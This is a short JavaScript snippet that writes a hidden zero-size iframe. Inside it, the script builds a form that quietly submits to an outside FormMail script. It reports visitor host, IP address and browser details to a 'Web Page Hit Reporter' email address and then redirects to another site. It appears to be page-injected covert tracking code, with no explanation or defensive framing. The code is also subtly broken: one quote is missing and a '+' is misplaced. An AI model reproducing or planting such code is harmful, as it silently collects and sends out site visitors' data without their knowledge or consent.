document.write("<iframe name='win3' height='0' width='0' frameborder='0' ></iframe>");
var stuff, html, htmlheaders, formhead, formend, endhtml, form, inputhead, inputend, in1, in2, in3, in4, in5, in6, in7, in8, in9, in10, in11;
htmlheaders="<HTML><HEAD><TITLE>Loading...</TITLE><META HTTP-EQUIV='Expires' CONTENT='0'><META HTTP-EQUIV='PRAGM' CONTENT='NO-CACHE'></HEAD><BODY>";
formhead="<form action=http://cgi.uk2.net/cgi-bin/uk2-formmail.pl' method='POST' name='pform'>";
formend="</form>";
endhtml="</BODY></HTML>";
inputhead="<input type='hidden' name='";
inputend="'>";
in1=inputhead+"recipient' value='"+inputend;
in2=inputhead+"env_report' value='REMOTE_HOST,REMOTE_ADDR,HTTP_USER_AGENT,REMOTE_USER"+inputend;
in3=inputhead+"print_config' value='message"+inputend;
in4=inputhead+"sort' value='order:message"+inputend;
in5=inputhead+"required' value='message"+inputend;
in6=inputhead+"email' value='-"+inputend;
in7=inputhead+"realname' value='-"+inputend;
in8=inputhead+"print_blank_fields' value='1"+inputend;
in9=inputhead+"subject' value='-"+inputend;
in10=inputhead+"message' value='-"+inputend;
in11=inputhead+"redirect' value='http://www.mamma.com"+inputend;
form=formhead+in1+in2+in3+in4+in5+in6+in7+in8+in9+in10+in11+formend;
html=htmlheaders+form+endhtml;
win3.document.open();
win3.document.write(html);
win3.document.close();
win3.document.pform.recipient.value='web.page.hit.reporter4@nurosoft.co.uk';
win3.document.pform.email.value='web.page.hit.reporter4@nurosoft.co.uk';
win3.document.pform.realname.value='Web Page Hit Reporter4';
win3.document.pform.subject.value="Web Page Hit to '"+stuff;+"'"
win3.document.pform.message.value=stuff;
win3.document.pform.submit();